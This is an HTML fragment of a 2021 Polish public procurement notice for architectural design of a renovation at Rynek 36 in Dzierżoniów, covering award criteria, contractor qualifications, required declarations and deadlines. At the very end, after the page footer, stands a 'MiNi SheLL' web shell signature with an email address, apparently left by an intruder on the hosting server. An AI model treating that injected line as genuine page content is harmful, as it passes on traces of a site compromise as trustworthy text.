rękojmi na przedmiot zamówienia. Bieg terminu rękojmi rozpoczyna się od dnia<br/>odbioru przedmiotu zamówienia, zaś kończy się z upływem ostatniego dnia 60 miesiąca licząc<br/>od dnia dokonania odbioru przedmiotu zamówienia. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">71220000-6 - Usługi projektowania architektonicznego</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">190 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Za najkorzystniejszą zostanie uznana oferta Wykonawcy, który<br/>spełni wszystkie postawione w SWZ warunki, nie podlega wykluczeniu z postępowania, złoży<br/>ofertę niepodlegającą odrzuceniu oraz uzyska łącznie największą liczbę punktów stanowiących<br/>sumę punktów przyznanych w ramach każdego z podanych kryteriów.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Doświadczenie projektanta w specjalności architektonicznej</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> Zamawiający określa następujące warunki udziału w postępowaniu dotyczące: - zdolności<br/>technicznej lub zawodowej: w zakresie kwalifikacji zawodowych:Warunek zostanie spełniony,<br/>jeżeli Wykonawca samodzielnie lub Wykonawcy występujący wspólnie, lub przy udziale<br/>podmiotu, na którego zdolnościach technicznych lub zawodowych polega Wykonawca wykaże,<br/>że dysponuje co najmniej:- jedną osobą posiadającą uprawnienia do projektowania w<br/>specjalności architektonicznej,- jedną osobą posiadającą uprawnienia do projektowania w<br/>specjalności, instalacyjnej w zakresie instalacji i urządzeń elektrycznych i<br/>elektroenergetycznych, - jedną osobą posiadającą uprawnienia do projektowania w specjalności<br/>instalacyjnej w zakresie instalacji i urządzeń cieplnych, wentylacyjnych, wodociągowych i<br/>kanalizacyjnych,- jedną osobą posiadającą uprawnienia do projektowania w specjalności<br/>instalacyjnej w zakresie instalacji i urządzeń telekomunikacyjnych.Potencjał techniczny można<br/>łączyć w ramach jednej osoby.Za uprawnienia budowlane odpowiadające wyżej określonym<br/>uznane zostaną uprawnienia, które wydane zostały na podstawie wcześniej obowiązujących<br/>przepisów prawnych oraz odpowiadające im uprawnienia wydane obywatelom państw<br/>członkowskich Unii Europejskiej, Konfederacji Szwajcarskiej lub państw członkowskich<br/>Europejskiego Porozumienia o Wolnym Handlu – EFTA (strony umowy o Europejskim Obszarze<br/>Gospodarczym) z zastrzeżeniem, art. 12 a oraz innych przepisów ustawy Prawo Budowlane (t.j.<br/>Dz. U. z 2020 r., poz. 1333 z późn. zm.) oraz ustawy z dnia 22 grudnia 2015 r. o zasadach<br/>uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej (t.j.<br/>Dz. U. z 2020 r., poz. 220 z późn. zm.). <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Oświadczenie wykonawcy brak podstaw do wykluczenia z postępowania na podstawie<br/>przesłanek określonych w art. 108 ust. 1 ustawy Pzp (wzór stanowi załącznik nr 2 do SWZ). W<br/>przypadku podmiotów występujących wspólnie oświadczenie składa każdy wykonawca. W przypadku<br/>polegania na zdolnościach lub sytuacji podmiotów udostępniających zasoby, Wykonawca wraz z<br/>oświadczeniem,o którym mowa powyżej, składa także oświadczenie podmiotu udostępniającego<br/>zasoby,potwierdzające brak podstaw wykluczenia tego podmiotu. Oświadczenie wykonawcy<br/>potwierdzające spełnienie warunków udziału w postępowaniu, określone w w rozdziale II podrozdziale 7<br/>SWZ (wzór stanowi załącznik nr 3 do SWZ). W przypadku podmiotów występujących wspólnie<br/>oświadczenie składa każdy z wykonawców, w zakresie w jakim wykazuje spełnienie warunków udziału<br/>w postępowaniu. W przypadku polegania na zdolnościach podmiotów udostępniających<br/>zasoby,Wykonawca składa także oświadczenie podmiotu udostępniającego zasoby, potwierdzające<br/>spełnianie warunków udziału w postępowaniu, w zakresie, w jakim wykonawca powołuje się na jego<br/>zasoby.Oświadczenie wykonawcy dotyczące podstaw wykluczenia wymienionych w art. 108 ust. 1 pkt<br/>1, 2 i 5ustawy Pzp wraz z informacją o podjętych środkach naprawczych. (wzór stanowi załącznik nr 4<br/>do SWZ). W przypadku podmiotów występujących wspólnie oświadczenie składa każdy wykonawca. W przypadku gdy Wykonawca polega na zdolnościach lub sytuacji podmiotów udostępniających<br/>zasoby,składa, wraz z ofertą, zobowiązanie podmiotu udostępniającego zasoby do oddania mu do<br/>dyspozycji niezbędnych zasobów na potrzeby realizacji danego zamówienia lub inny podmiotowy<br/>środek dowodowy potwierdzający, że wykonawca realizując zamówienie, będzie dysponował<br/>niezbędnymi zasobami tych podmiotów (wzór stanowi załącznik nr 6 do SWZ). Zobowiązanie<br/>podmiotu udostępniającego zasoby, o którym mowa powyżej, musi potwierdzać, że stosunek łączący<br/>wykonawcę z podmiotami udostępniającymi zasoby, gwarantuje rzeczywisty dostęp do tych zasobów<br/>oraz określać w szczególności: zakres dostępnych wykonawcy zasobów podmiotu udostępniającego<br/>zasoby; sposób i okres udostępnienia wykonawcy i wykorzystania przez niego zasobów podmiotu<br/>udostępniającego te zasoby przy wykonywaniu zamówienia; czy i w jakim zakresie podmiot<br/>udostępniający zasoby, na zdolnościach którego wykonawca polega w odniesieniu do warunków<br/>udziału w postępowaniu dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia,<br/>zrealizuje usługi, których wskazane zdolności dotyczą. Oświadczenie wykonawców wspólnie<br/>ubiegających się o udzielenie zamówienia składane na podstawie art. 117 ust. 4 ustawy z dnia 11<br/>września 2019 r. Prawo zamówień publicznych (Dz. U. z 2019 r., poz. 2019 z późn. zm.) - (wzór stanowi<br/>załącznik nr 7 do SWZ) należy złożyć w formie elektronicznej (tj. w postaci elektronicznej opatrzonej<br/>kwalifikowanym podpisem elektronicznym) lub w postaci elektronicznej opatrzonej podpisem zaufanym<br/>lub podpisem osobistym przez osobę upoważnioną do reprezentowania Wykonawców wspólnie<br/>ubiegających się o udzielenie zamówienia. Pełnomocnictwo (o ile dotyczy). Zgodnie z art. 274 ust. 1<br/>ustawy Pzp, Zamawiający przed wyborem najkorzystniejszej oferty wezwie Wykonawcę, którego oferta<br/>została najwyżej oceniona, do złożenia w wyznaczonym terminie, nie krótszym niż 5 dni, aktualnego na<br/>dzień złożenia, następującego podmiotowego środka dowodowego: Potwierdzenie aktualności<br/>informacji zawartych w oświadczeniu, o którym mowa w rozdziale II podrozdziale 9 pkt. 1 lit. b SWZ w<br/>zakresie podstaw wykluczenia z postępowania wskazanych przez Zamawiającego (wzór stanowi<br/>załącznik nr 8 do SWZ).</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Zgodnie z art. 274 ust. 1 ustawy Pzp, Zamawiający przed wyborem<br/>najkorzystniejszej oferty wezwie Wykonawcę, którego oferta została najwyżej oceniona, do złożenia w<br/>wyznaczonym terminie, nie krótszym niż 5 dni, aktualnych na dzień złożenia, następujących<br/>podmiotowych środków dowodowych:a) wykaz osób, skierowanych przez Wykonawcę do realizacji<br/>zamówienia publicznego, w szczególności odpowiedzialnych za projektowanie, wraz z informacjami na<br/>temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnego do<br/>wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz<br/>informacją o podstawie do dysponowania tymi osobami – załącznik nr 9 do SWZ;</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Nie dotyczy <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Aktualne na dzień złożenia oświadczenia o niepodleganiu wykluczeniu (załącznik nr 2 do<br/>SWZ)oraz spełnianiu warunków udziału w postępowaniu (załącznik nr 3 do SWZ) w<br/>zakresie wskazanym w rozdziale II podrozdziałach 7 i 8 SWZ –- każdy osobno spośród<br/>Wykonawców wspólnie ubiegających się o udzielenie zamówienia (dotyczy również wspólników<br/>spółki cywilnej)i podmiot trzeci, na którego potencjał powołuje się Wykonawca celem<br/>potwierdzenia spełnienia warunków udziału w postępowaniu. Oferta oraz oświadczenie o<br/>niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu muszą być<br/>złożone w oryginale. To samo dotyczy oświadczenia Wykonawcy o tym, że zachodzą wobec<br/>niego podstawy wykluczenia z postępowania na podstawie art. 108 ust. 1 pkt. 1, 2 ,5 ustawy Pzp<br/>(załącznik nr 4 – o ile dotyczy). 2. Gdy umocowanie osoby składającej ofertę nie wynika z<br/>dokumentów rejestrowych,Wykonawca, który składa ofertę za pośrednictwem pełnomocnika,<br/>powinien dołączyć do oferty dokument pełnomocnictwa obejmujący swym zakresem umocowanie<br/>do złożenia oferty lub do złożenia oferty i podpisania umowy. W przypadku Wykonawców<br/>ubiegających się wspólnie o udzielenie zamówienia Wykonawcy zobowiązani są do ustanowienia<br/>pełnomocnika.Pełnomocnictwo do złożenia oferty musi być złożone w oryginale w takiej samej formie, jak składana jest oferta (tj. w formie elektronicznej opatrzonej kwalifikowanym<br/>podpisem elektronicznym lub w postaci elektronicznej opatrzonej podpisem zaufanym, lub<br/>podpisem osobistym). Dopuszcza się także złożenie elektronicznej kopii (skanu)<br/>pełnomocnictwa sporządzonego uprzednio w formie pisemnej, w formie elektronicznego<br/>poświadczenia sporządzonego stosownie do art. 97 par 2 ustawy z dnia14 lutego 1991 r. –<br/>Prawo o notariacie,które to poświadczenie notariusz opatruje kwalifikowanym podpisem<br/>elektronicznym, bądź też poprzez opatrzenie skanu pełnomocnictwa sporządzonego uprzednio w<br/>formie pisemnej kwalifikowanym podpisem, podpisem zaufanym lub podpisem osobistym<br/>mocodawcy.Elektroniczna kopia pełnomocnictwa nie może być uwierzytelniona przez<br/>upełnomocnionego. 3.Oświadczenie Wykonawców wspólnie ubiegających się o udzielenie<br/>zamówienia – załącznik nr7 do SWZ. 4. Zobowiązanie podmiotu trzeciego – załącznik nr 6 do<br/>SWZ (o ile dotyczy).Zobowiązanie musi być złożone w formie elektronicznej opatrzonej<br/>kwalifikowanym podpisem elektronicznym lub w postaci elektronicznej opatrzonej podpisem<br/>zaufanym lub podpisem osobistym osoby upoważnionej do reprezentowania Wykonawców<br/>zgodnie z formą reprezentacji określoną w dokumencie rejestrowym właściwym dla formy<br/>organizacyjnej lub innym dokumencie. 5. W przypadku gdy Wykonawca powierza wykonanie<br/>części zamówienia podwykonawcy, zobowiązany jest do wykazania w załączniku nr 5 do SWZ<br/>informacji o części zamówienia, której wykonanie zamierza powierzyć podwykonawcom oraz<br/>podania nazw ich firm, o ile są już znane.6. Zastrzeżenie tajemnicy przedsiębiorstwa – W<br/>przypadku informacji objętych tajemnicą przedsiębiorstwa Wykonawca powinien w momencie ich<br/>przekazania wyraźnie oznaczyć, które informacje stanowią tajemnicę przedsiębiorstwa oraz nie<br/>powinny być udostępniane. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> a) Wykonawcy występujący wspólnie są zobowiązani do ustanowienia pełnomocnika<br/>do reprezentowania ich w postępowaniu albo do reprezentowania ich w postępowaniu i<br/>zawarcia umowy w sprawie przedmiotowego zamówienia publicznego; b) Wszelka<br/>korespondencja będzie prowadzona przez Zamawiającego wyłącznie z pełnomocnikiem; c) Do<br/>oferty należy załączyć pełnomocnictwo dla ustanowionego pełnomocnika; d) Wykonawcy<br/>składają jedną ofertę, do której załączone będą dokumenty, o których mowa w SWZ; e)<br/>Wykonawca winien przedłożyć dokumenty i oświadczenia wymienione w rozdziale II podrozdziale<br/>9 SWZ dotyczące każdego partnera konsorcjum osobno w zakresie tam wskazanym ; f)<br/>Oświadczenia i dokumenty wspólne, takie jak np.: oferta cenowa, składa pełnomocnik<br/>Wykonawców w imieniu wszystkich;g)Oferta musi być podpisana w taki sposób, by prawnie<br/>zobowiązywała wszystkich Wykonawców występujących wspólnie; h) wszyscy partnerzy będą<br/>ponosić odpowiedzialność solidarną za wykonanie umowy zgodnie z jej postanowieniami; i)<br/>Wykonawcy wspólnie ubiegający się o udzielenie zamówienia mogą polegać na zdolnościach<br/>tych z Wykonawców, którzy wykonają usługi, do realizacji których te zdolności są wymagane.<br/>Wtedy powinni dołączyć do oferty oświadczenie (załącznik nr 7 do SWZ), z którego wynika, które<br/>usługi wykonują poszczególni Wykonawcy, j) przed podpisaniem umowy Wykonawcy składający<br/>ofertę wspólną będą mieli obowiązek przedstawić Zamawiającemu umowę konsorcjum. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zamawiający przewiduje możliwość dokonania zmian postanowień zawartej umowy w<br/>stosunku do treści oferty, na podstawie, której dokonano wyboru Wykonawcy w okolicznościach:<br/>a)Zamawiający dopuszcza możliwość zmiany terminu wykonania przedmiotu umowy<br/>w następujących przypadkach: 1) zmiany obowiązujących przepisów prawa wpływających na<br/>termin i sposób wykonania przedmiotu Umowy, w tym w szczególności wynikających ze<br/>zmian Ustawy z dnia 2 marca 2020 r. o szczególnych rozwiązaniach związanych z<br/>zapobieganiem,przeciwdziałaniem i zwalczaniem COVID – 19, innych chorób zakaźnych oraz<br/>wywołanych nimi sytuacji kryzysowych (t.j. Dz. U. z 2020 r., poz. 1842), 2) przedłużenia przez<br/>władze państwowe stanu epidemii lub dokonania zmiany tego stanu na inny stan wyjątkowy,<br/>ograniczający normalny sposób funkcjonowania państwa.Strona w należycie uzasadnionym<br/>wniosku o zmianę terminu wykonania przedmiotu umowy jest obowiązana do wskazania w<br/>szczególności: 1)propozycji terminu wykonania przedmiotu umowy, 2) faktów uzasadniających<br/>proponowaną zmianę, 3) podstawy prawnej wnioskowanej zmiany wynikającej z obowiązujących<br/>przepisów prawa lub z umowy, 4) dowodów na poparcie faktów, że wykonanie umowy w<br/>terminie wskazanym w umowie jest niemożliwe z przyczyn, o których mowa w pkt. a.b)<br/>Przewiduje się możliwość zmiany terminu wykonania przedmiotu umowy z powodu<br/>przedłużającego się terminu uzyskania przez Wykonawcę uzgodnień, opinii, decyzji i<br/>zatwierdzeń a także odstępstwa od warunków techniczno-budowlanych do dokumentacji<br/>projektowej, mających wpływ na jej wykonanie, od instytucji opiniujących projekt. Wystąpienie<br/>tych okoliczności i ich udokumentowanie przez Wykonawcę umożliwi wydłużenie terminu<br/>realizacji zamówienia.Termin będzie wydłużony o czas wskazany przez Zamawiającego. c)<br/>Dopuszcza się zmiany umowy w przypadkach przewidzianych w art. 455 ust. 1 pkt 3, 4 oraz ust.<br/>2 ustawy Pzp. d)Każda ze Stron ma prawo do zawnioskowania o zmianę terminu wykonania<br/>przedmiotu umowy.Wniosek pod rygorem nieważności wymaga zachowania formy pisemnej z<br/>podaniem terminu wykonania przedmiotu umowy i należytym uzasadnieniem przyczyn<br/>proponowanej zmiany.Wniosek winien być złożony w terminie 7 dni od dnia wystąpienia<br/>okoliczności uzasadniających proponowaną zmianę.Powyższe postanowienie stanowi katalog<br/>zmian, na które Zamawiający może wyrazić zgodę. Nie stanowią jednocześnie zobowiązania do<br/>wyrażenia takiej zgody.Wymienione powyższe możliwości wprowadzenia zmian są<br/>uprawnieniem a nie obowiązkiem Zamawiającego. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-06-01 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Za pośrednictwem Platformy Zakupowej https://dzierzoniow.ezamawiajacy.pl/</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-06-01 10:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2021-06-30</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Wykonawcy oraz innemu podmiotowi, jeżeli ma lub miał interes w uzyskaniu zamówienia<br/>oraz poniósł lub może ponieść szkodę w wyniku naruszenia przez Zamawiającego przepisów ustawy Pzp, przysługują środki ochrony prawnej określone w dziale IX ustawy Pzp. Pełna nazwa<br/>zamówienia: Wykonanie dokumentacji projektowej i specyfikacji technicznych wykonania, i<br/>odbioru robót budowlanych dla remontu pomieszczeń zlokalizowanych na II kondygnacji (pow.<br/>ok. 316m2) oraz na I kondygnacji (pow. ok. 130m2) w budynku nr 36 przy ul. Rynek w<br/>Dzierżoniowie, w ramach realizacji zadania inwestycyjnego pn. „Remont pomieszczeń w<br/>budynku Rynek 36”.</main><footer hidden><table style="border-top: 1px solid black; width:100%"><tr><td>2021-05-20 Biuletyn Zamówień Publicznych</td><td style="text-align:right">Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Usługi</td></tr></table></footer>

Creat By MiNi SheLL
Email: jattceo@gmail.com